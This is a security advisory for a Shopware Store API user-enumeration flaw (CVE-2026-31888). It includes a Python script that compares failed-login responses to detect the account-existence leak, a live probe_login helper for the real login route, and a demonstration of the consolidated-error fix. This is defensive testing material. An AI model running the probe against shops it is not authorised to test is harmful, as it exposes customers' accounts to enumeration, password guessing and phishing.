Inconsistent Error Handling in Shopware Store API Login Endpoint
CVE-2026-31888
What is CVE-2026-31888?
Shopware, a popular open commerce platform, contains a user-enumeration weakness in its Store API login endpoint. When a login attempt fails, the endpoint returns different error responses depending on whether the submitted email address belongs to a registered customer: a registered address with a wrong password yields one error code, while an unregistered address yields a different error code whose message echoes the submitted address back. The storefront login controller consolidates these failures into a single generic error, but the Store API did not, so an unauthenticated attacker can submit a list of email addresses with arbitrary passwords and tell from the error code alone which addresses have customer accounts. The leaked list of valid accounts does not grant access by itself, but it narrows follow-on attacks such as password guessing or targeted phishing to known customers. The issue is fixed in Shopware 6.7.8.1 and 6.6.10.15.
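The following script is an added example for this advisory, not Shopware code. It reduces a failed Store API login response to the features an attacker can observe (HTTP status, error codes, and whether the submitted email is echoed back), compares the response for a known-registered address against one for an unregistered address, and reports whether the two are distinguishable. The sample responses are constructed to model the pre-fix behaviour described above; the error code strings in them are assumptions and are not listed in the advisory. The probe_login helper targets Shopware's real POST /store-api/account/login route with its sw-access-key header, but the script runs offline on the constructed samples, and consolidate() illustrates the storefront-style fix of collapsing all authentication failures into one generic error.

```python
"""
User-enumeration oracle check for a Store API login endpoint.

Added example for this advisory; not Shopware's own code. The JSON bodies
below are constructed to match the behaviour the advisory describes:
one error code for a registered email with a wrong password, a different
error code (with the address echoed back) for an unregistered email.
The error code strings themselves are assumptions.
"""
import json
from urllib import error, request


def fingerprint(status, body, submitted_email):
    """Reduce a failed-login response to what an unauthenticated attacker
    can see: HTTP status, the set of error codes, and whether the email
    they submitted appears anywhere in the response."""
    errors = body.get("errors", []) if isinstance(body, dict) else []
    codes = tuple(sorted(e.get("code", "") for e in errors))
    echoed = submitted_email.lower() in json.dumps(body).lower()
    return {"status": status, "codes": codes, "echoes_email": echoed}


def is_enumeration_oracle(fp_registered, fp_unregistered):
    """Any stable attacker-visible difference between the two failures is
    enough to enumerate accounts, not only a different message text."""
    return fp_registered != fp_unregistered


def probe_login(base_url, access_key, email, password="not-the-password"):
    """Send one login attempt to Shopware's Store API login route and return
    (status, decoded JSON). The sw-access-key header carries the sales
    channel's API key. Not exercised offline; shown for live testing."""
    url = f"{base_url.rstrip('/')}/store-api/account/login"
    payload = json.dumps({"username": email, "password": password}).encode()
    req = request.Request(
        url, data=payload, method="POST",
        headers={
            "Content-Type": "application/json",
            "Accept": "application/json",
            "sw-access-key": access_key,
        },
    )
    try:
        with request.urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"{}")
    except error.HTTPError as e:
        raw = e.read()
        try:
            return e.code, json.loads(raw)
        except ValueError:
            return e.code, {"raw": raw.decode(errors="replace")}


def consolidate(status, body):
    """The storefront-style fix: every authentication failure, whatever its
    internal cause, becomes the same status and the same generic error, and
    the submitted address is never reflected. Arguments are ignored on purpose."""
    return 401, {"errors": [{
        "status": "401",
        "code": "CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS",
        "detail": "Invalid username and/or password.",
    }]}


# Constructed sample data (not captured from a real shop).
REGISTERED = "alice@example.com"
UNREGISTERED = "nobody-here@example.com"

# Pre-fix behaviour: distinct codes, and the unregistered address echoed back.
VULN_REGISTERED = (401, {"errors": [{
    "status": "401",
    "code": "CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS",  # assumed code name
    "detail": "Invalid username and/or password.",
}]})
VULN_UNREGISTERED = (401, {"errors": [{
    "status": "401",
    "code": "CHECKOUT__CUSTOMER_NOT_FOUND",  # assumed code name
    "detail": f'No matching customer for the email "{UNREGISTERED}" was found.',
}]})


def check(registered_resp, unregistered_resp):
    """Return True if the pair of failed logins leaks account existence."""
    fp_r = fingerprint(*registered_resp, REGISTERED)
    fp_u = fingerprint(*unregistered_resp, UNREGISTERED)
    return is_enumeration_oracle(fp_r, fp_u)


if __name__ == "__main__":
    print("pre-fix leaks:", check(VULN_REGISTERED, VULN_UNREGISTERED))
    print("consolidated leaks:",
          check(consolidate(*VULN_REGISTERED), consolidate(*VULN_UNREGISTERED)))
```

To test a real shop, call probe_login twice with an address you own and a random one, then pass the two results to fingerprint and is_enumeration_oracle. The check covers only status, codes and reflected input; response timing is a separate side channel that this advisory does not address.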
Affected Version(s)
Package    Affected versions          Fixed in
core       >= 6.7.0.0, < 6.7.8.1      6.7.8.1
core       < 6.6.10.15                6.6.10.15
platform   >= 6.7.0.0, < 6.7.8.1      6.7.8.1
